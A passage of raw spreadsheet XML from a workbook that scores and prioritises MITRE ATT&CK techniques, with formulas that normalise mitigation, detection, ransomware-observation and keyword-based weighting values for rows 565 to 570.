      <c r="AN565" s="65">
        <v>0</v>
      </c>
      <c r="AO565" s="51">
        <v>0</v>
      </c>
      <c r="AP565" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="AQ565" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AR565" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AS565" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT565" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU56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66" spans="1:47">
      <c r="A566" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="B566" s="25">
        <f>SUM(H566,M566,V566)*(1+SUM(AE566,AG566,AI566,AK566,AM566))</f>
        <v>0.05</v>
      </c>
      <c r="C566" s="25" t="s">
        <v>1944</v>
      </c>
      <c r="D566" s="25" t="s">
        <v>1942</v>
      </c>
      <c r="E566" s="25" t="s">
        <v>1938</v>
      </c>
      <c r="F566" s="51">
        <v>0</v>
      </c>
      <c r="G566" s="51">
        <v>1</v>
      </c>
      <c r="H566" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I566">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J566">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K566">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L566">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M566" s="25">
        <v>0</v>
      </c>
      <c r="N566" s="51">
        <v>0</v>
      </c>
      <c r="O566" s="51">
        <v>0</v>
      </c>
      <c r="P566" s="51">
        <v>0</v>
      </c>
      <c r="Q566" s="51">
        <v>0</v>
      </c>
      <c r="R566" s="51"/>
      <c r="S566" s="51">
        <v>0</v>
      </c>
      <c r="T566" s="51"/>
      <c r="U566" s="51">
        <v>0</v>
      </c>
      <c r="V566" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W566">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X566">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y566">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z566">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA566">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB566">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC566" s="29"/>
      <c r="AD566" s="25" t="str" cm="1">
        <f t="array" ref="AD566">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC566)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE566" s="25">
        <f>IF(AD566="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF566" s="25" t="str" cm="1">
        <f t="array" ref="AF566">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC566)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG566" s="25">
        <f>IF(AF566="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH566" s="25" t="str" cm="1">
        <f t="array" ref="AH566">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC566)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI566" s="25">
        <f>IF(AH566="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ566" s="25" t="str" cm="1">
        <f t="array" ref="AJ566">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC566)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK566" s="25">
        <f>IF(AJ566="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL566" s="25" t="str" cm="1">
        <f t="array" ref="AL566">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC566)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM566" s="25">
        <f>IF(AL566="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN566" s="52">
        <v>0</v>
      </c>
      <c r="AO566" s="51">
        <v>0</v>
      </c>
      <c r="AP566" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="AQ566" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AR566" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AS566" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT566" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU56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67" spans="1:47">
      <c r="A567" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="B567" s="25">
        <f>SUM(H567,M567,V567)*(1+SUM(AE567,AG567,AI567,AK567,AM567))</f>
        <v>0.05</v>
      </c>
      <c r="C567" s="25" t="s">
        <v>1945</v>
      </c>
      <c r="D567" s="25" t="s">
        <v>1942</v>
      </c>
      <c r="E567" s="25" t="s">
        <v>1940</v>
      </c>
      <c r="F567" s="51">
        <v>0</v>
      </c>
      <c r="G567" s="51">
        <v>1</v>
      </c>
      <c r="H567" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I567">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J567">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K567">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L567">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M567" s="25">
        <v>0</v>
      </c>
      <c r="N567" s="51">
        <v>0</v>
      </c>
      <c r="O567" s="51">
        <v>0</v>
      </c>
      <c r="P567" s="51">
        <v>0</v>
      </c>
      <c r="Q567" s="51">
        <v>0</v>
      </c>
      <c r="R567" s="51"/>
      <c r="S567" s="51">
        <v>0</v>
      </c>
      <c r="T567" s="51"/>
      <c r="U567" s="51">
        <v>0</v>
      </c>
      <c r="V567" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W567">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X567">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y567">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z567">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA567">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB567">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC567" s="29"/>
      <c r="AD567" s="25" t="str" cm="1">
        <f t="array" ref="AD567">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC567)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE567" s="25">
        <f>IF(AD567="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF567" s="25" t="str" cm="1">
        <f t="array" ref="AF567">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC567)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG567" s="25">
        <f>IF(AF567="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH567" s="25" t="str" cm="1">
        <f t="array" ref="AH567">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC567)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI567" s="25">
        <f>IF(AH567="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ567" s="25" t="str" cm="1">
        <f t="array" ref="AJ567">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC567)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK567" s="25">
        <f>IF(AJ567="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL567" s="25" t="str" cm="1">
        <f t="array" ref="AL567">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC567)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM567" s="25">
        <f>IF(AL567="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN567" s="60">
        <v>0</v>
      </c>
      <c r="AO567" s="51">
        <v>0</v>
      </c>
      <c r="AP567" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="AQ567" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AR567" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AS567" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT567" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU56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68" spans="1:47">
      <c r="A568" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="B568" s="25">
        <f>SUM(H568,M568,V568)*(1+SUM(AE568,AG568,AI568,AK568,AM568))</f>
        <v>0.05</v>
      </c>
      <c r="C568" s="25" t="s">
        <v>1946</v>
      </c>
      <c r="D568" s="25" t="s">
        <v>1626</v>
      </c>
      <c r="E568" s="25" t="s">
        <v>1873</v>
      </c>
      <c r="F568" s="51">
        <v>0</v>
      </c>
      <c r="G568" s="51">
        <v>1</v>
      </c>
      <c r="H568" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I568">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J568">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K568">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L568">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M568" s="25">
        <v>0</v>
      </c>
      <c r="N568" s="51">
        <v>0</v>
      </c>
      <c r="O568" s="51">
        <v>0</v>
      </c>
      <c r="P568" s="51">
        <v>0</v>
      </c>
      <c r="Q568" s="51">
        <v>0</v>
      </c>
      <c r="R568" s="51"/>
      <c r="S568" s="51">
        <v>0</v>
      </c>
      <c r="T568" s="51"/>
      <c r="U568" s="51">
        <v>0</v>
      </c>
      <c r="V568" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W568">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X568">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y568">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z568">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA568">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB568">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC568" s="29"/>
      <c r="AD568" s="25" t="str" cm="1">
        <f t="array" ref="AD568">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC568)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE568" s="25">
        <f>IF(AD568="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF568" s="25" t="str" cm="1">
        <f t="array" ref="AF568">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC568)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG568" s="25">
        <f>IF(AF568="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH568" s="25" t="str" cm="1">
        <f t="array" ref="AH568">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC568)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI568" s="25">
        <f>IF(AH568="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ568" s="25" t="str" cm="1">
        <f t="array" ref="AJ568">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC568)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK568" s="25">
        <f>IF(AJ568="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL568" s="25" t="str" cm="1">
        <f t="array" ref="AL568">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC568)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM568" s="25">
        <f>IF(AL568="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN568" s="60">
        <v>0</v>
      </c>
      <c r="AO568" s="51">
        <v>0</v>
      </c>
      <c r="AP568" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="AQ568" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AR568" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AS568" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT568" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU56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69" spans="1:47">
      <c r="A569" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="B569" s="25">
        <f>SUM(H569,M569,V569)*(1+SUM(AE569,AG569,AI569,AK569,AM569))</f>
        <v>0.05</v>
      </c>
      <c r="C569" s="25" t="s">
        <v>1947</v>
      </c>
      <c r="D569" s="25" t="s">
        <v>1626</v>
      </c>
      <c r="E569" s="25" t="s">
        <v>1875</v>
      </c>
      <c r="F569" s="51">
        <v>0</v>
      </c>
      <c r="G569" s="51">
        <v>1</v>
      </c>
      <c r="H569" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I569">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J569">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K569">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L569">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M569" s="25">
        <v>0</v>
      </c>
      <c r="N569" s="51">
        <v>0</v>
      </c>
      <c r="O569" s="51">
        <v>0</v>
      </c>
      <c r="P569" s="51">
        <v>0</v>
      </c>
      <c r="Q569" s="51">
        <v>0</v>
      </c>
      <c r="R569" s="51"/>
      <c r="S569" s="51">
        <v>0</v>
      </c>
      <c r="T569" s="51"/>
      <c r="U569" s="51">
        <v>0</v>
      </c>
      <c r="V569" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W569">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X569">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y569">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z569">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA569">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB569">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC569" s="29"/>
      <c r="AD569" s="25" t="str" cm="1">
        <f t="array" ref="AD569">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC569)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE569" s="25">
        <f>IF(AD569="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF569" s="25" t="str" cm="1">
        <f t="array" ref="AF569">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC569)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG569" s="25">
        <f>IF(AF569="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH569" s="25" t="str" cm="1">
        <f t="array" ref="AH569">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC569)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI569" s="25">
        <f>IF(AH569="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ569" s="25" t="str" cm="1">
        <f t="array" ref="AJ569">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC569)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK569" s="25">
        <f>IF(AJ569="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL569" s="25" t="str" cm="1">
        <f t="array" ref="AL569">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC569)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM569" s="25">
        <f>IF(AL569="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN569" s="52">
        <v>0</v>
      </c>
      <c r="AO569" s="51">
        <v>0</v>
      </c>
      <c r="AP569" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="AQ569" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AR569" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AS569" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT569" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU56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70" spans="1:47">
      <c r="A570" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="B570" s="25">
        <f>SUM(H570,M570,V570)*(1+SUM(AE570,AG570,AI570,AK570,AM570))</f>
        <v>0.05</v>
      </c>
      <c r="C570" s="25" t="s">
        <v>1948</v>
      </c>
      <c r="D570" s="25" t="s">
        <v>1663</v>
      </c>
      <c r="E570" s="25" t="s">
        <v>1949</v>
      </c>
      <c r="F570" s="51">
        <v>0</v>
      </c>
      <c r="G570" s="51">
        <v>1</v>
      </c>
      <c r="H570" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I570">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J570">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K570">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L570">
